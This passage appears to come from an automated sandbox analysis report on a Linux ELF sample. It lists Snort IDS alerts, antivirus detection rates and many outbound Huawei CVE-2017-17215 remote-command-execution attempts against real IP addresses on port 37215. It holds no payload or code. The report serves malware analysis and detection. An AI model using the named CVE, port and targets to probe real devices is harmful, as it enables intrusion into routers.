          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029879
          SID:2835222
          Source Port:43982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994711
          SID:2829579
          Source Port:53728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078731
          SID:2835222
          Source Port:45180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105380
          SID:2829579
          Source Port:34026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944869
          SID:2835222
          Source Port:52960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721078
          SID:2829579
          Source Port:32934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714430
          SID:2835222
          Source Port:33038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921114
          SID:2829579
          Source Port:53354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165958
          SID:2835222
          Source Port:57080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077687
          SID:2835222
          Source Port:45884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282183
          SID:2835222
          Source Port:57946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.083056
          SID:2835222
          Source Port:43342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.003661
          SID:2835222
          Source Port:47824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078069
          SID:2835222
          Source Port:51124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869172
          SID:2829579
          Source Port:45194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082999
          SID:2835222
          Source Port:60646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160308
          SID:2829579
          Source Port:35994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645654
          SID:2835222
          Source Port:43700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948029
          SID:2829579
          Source Port:49548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157726
          SID:2835222
          Source Port:57346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415916
          SID:2829579
          Source Port:57946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540227
          SID:2835222
          Source Port:46890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162333
          SID:2835222
          Source Port:41974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.644882
          SID:2835222
          Source Port:37076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714334
          SID:2829579
          Source Port:42522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867040
          SID:2829579
          Source Port:54438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038107
          SID:2829579
          Source Port:49658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993671
          SID:2835222
          Source Port:54688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272259
          SID:2835222
          Source Port:39168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.101999
          SID:2835222
          Source Port:56506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414396
          SID:2829579
          Source Port:56512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869205
          SID:2835222
          Source Port:41360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287456
          SID:2829579
          Source Port:57960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862584
          SID:2835222
          Source Port:44460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.553844
          SID:2835222
          Source Port:42748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948632
          SID:2835222
          Source Port:41736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: bVMuPnsMIq.elfVirustotal: Detection: 17%Perma Link
          Source: bVMuPnsMIq.elfReversingLabs: Detection: 26%

          Networking

          barindex
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58962 -> 186.122.190.56:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58962 -> 186.122.190.56:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55010 -> 156.254.78.63:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55010 -> 156.254.78.63:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:32962 -> 45.16.199.75:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:32962 -> 45.16.199.75:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33356 -> 190.115.49.159:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33356 -> 190.115.49.159:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34060 -> 121.176.248.132:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34060 -> 121.176.248.132:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37096 -> 197.7.11.70:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37096 -> 197.7.11.70:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58566 -> 37.50.109.164:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58566 -> 37.50.109.164:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43904 -> 190.95.159.127:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43904 -> 190.95.159.127:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35242 -> 172.82.150.19:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35242 -> 172.82.150.19:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38270 -> 94.94.90.151:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38270 -> 94.94.90.151:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37634 -> 222.22.132.57:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37634 -> 222.22.132.57:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39820 -> 181.115.126.58:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39820 -> 181.115.126.58:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34594 -> 190.21.40.128:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34594 -> 190.21.40.128:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60668 -> 94.71.196.176:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60668 -> 94.71.196.176:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52404 -> 183.28.181.154:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52404 -> 183.28.181.154:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54852 -> 121.242.39.26:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54852 -> 121.242.39.26:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59460 -> 156.61.113.106:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59460 -> 156.61.113.106:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55664 -> 121.59.184.112:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55664 -> 121.59.184.112:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59550 -> 152.254.176.41:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59550 -> 152.254.176.41:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53448 -> 156.251.203.178:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53448 -> 156.251.203.178:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54546 -> 181.167.14.221:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54546 -> 181.167.14.221:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40034 -> 31.154.160.2:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40034 -> 31.154.160.2:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45840 -> 190.235.37.109:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45840 -> 190.235.37.109:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43966 -> 186.154.108.132:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43966 -> 186.154.108.132:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35680 -> 190.146.194.234:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35680 -> 190.146.194.234:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55800 -> 181.213.144.74:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55800 -> 181.213.144.74:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36006 -> 102.232.214.103:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36006 -> 102.232.214.103:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42260 -> 94.25.107.66:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42260 -> 94.25.107.66:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60442 -> 222.35.213.115:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60442 -> 222.35.213.115:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52268 -> 157.27.135.139:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52268 -> 157.27.135.139:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40440 -> 197.81.136.99:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40440 -> 197.81.136.99:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:32804 -> 121.72.232.31:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:32804 -> 121.72.232.31:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54054 -> 186.204.27.246:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54054 -> 186.204.27.246:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42190 -> 181.96.242.149:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42190 -> 181.96.242.149:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36224 -> 35.30.174.150:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36224 -> 35.30.174.150:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38592 -> 122.249.153.87:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38592 -> 122.249.153.87:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39594 -> 87.249.177.133:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39594 -> 87.249.177.133:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55434 -> 121.247.31.69:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55434 -> 121.247.31.69:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56064 -> 94.211.9.188:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56064 -> 94.211.9.188:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49964 -> 94.55.21.112:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49964 -> 94.55.21.112:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58562 -> 138.31.135.20:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58562 -> 138.31.135.20:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60212 -> 190.127.127.117:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60212 -> 190.127.127.117:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41996 -> 197.155.20.65:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41996 -> 197.155.20.65:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50494 -> 138.20.236.9:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50494 -> 138.20.236.9:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56438 -> 181.175.29.226:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56438 -> 181.175.29.226:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48580 -> 45.70.109.47:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48580 -> 45.70.109.47:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37440 -> 190.75.122.59:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37440 -> 190.75.122.59:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45172 -> 121.90.138.98:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45172 -> 121.90.138.98:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43904 -> 157.228.80.243:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43904 -> 157.228.80.243:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35062 -> 157.38.243.210:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35062 -> 157.38.243.210:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40318 -> 91.244.7.255:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40318 -> 91.244.7.255:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55834 -> 138.87.102.237:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55834 -> 138.87.102.237:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50402 -> 186.199.181.243:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50402 -> 186.199.181.243:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44800 -> 222.80.134.44:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44800 -> 222.80.134.44:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59682 -> 102.4.87.127:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59682 -> 102.4.87.127:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50432 -> 41.108.231.247:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50432 -> 41.108.231.247:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46648 -> 102.179.57.104:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46648 -> 102.179.57.104:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52012 -> 122.11.106.146:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52012 -> 122.11.106.146:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41286 -> 181.113.129.211:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41286 -> 181.113.129.211:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47278 -> 173.93.221.6:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47278 -> 173.93.221.6:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46072 -> 41.139.66.152:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46072 -> 41.139.66.152:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51618 -> 41.24.66.21:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51618 -> 41.24.66.21:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33990 -> 165.161.169.82:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33990 -> 165.161.169.82:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47232 -> 121.98.142.228:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47232 -> 121.98.142.228:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37470 -> 181.31.126.83:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37470 -> 181.31.126.83:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58410 -> 156.97.153.226:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58410 -> 156.97.153.226:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33764 -> 197.138.132.102:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33764 -> 197.138.132.102:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41732 -> 121.212.215.21:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41732 -> 121.212.215.21:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60952 -> 37.172.12.244:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60952 -> 37.172.12.244:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43150 -> 121.139.61.235:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43150 -> 121.139.61.235:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48438 -> 222.247.107.194:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48438 -> 222.247.107.194:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50884 -> 222.80.126.127:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50884 -> 222.80.126.127:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54586 -> 186.82.113.50:37215
